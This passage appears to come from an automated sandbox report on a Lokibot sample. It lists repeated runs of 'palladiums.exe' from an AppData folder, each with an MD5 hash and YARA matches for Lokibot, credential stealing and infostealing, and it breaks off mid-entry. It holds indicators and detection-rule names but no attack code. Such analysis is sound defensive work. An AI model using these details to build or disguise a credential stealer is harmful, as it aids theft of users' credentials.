                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:05:02:18
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:05:02:18
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:05:02:19
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:05:02:20
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:05:02:21
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:05:02:22
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:29
                                                              Start time:05:02:23
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:05:02:24
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:05:02:25
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:32
                                                              Start time:05:02:26
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:05:02:26
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:05:02:27
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:35
                                                              Start time:05:02:28
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:36
                                                              Start time:05:02:30
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:37
                                                              Start time:05:02:31
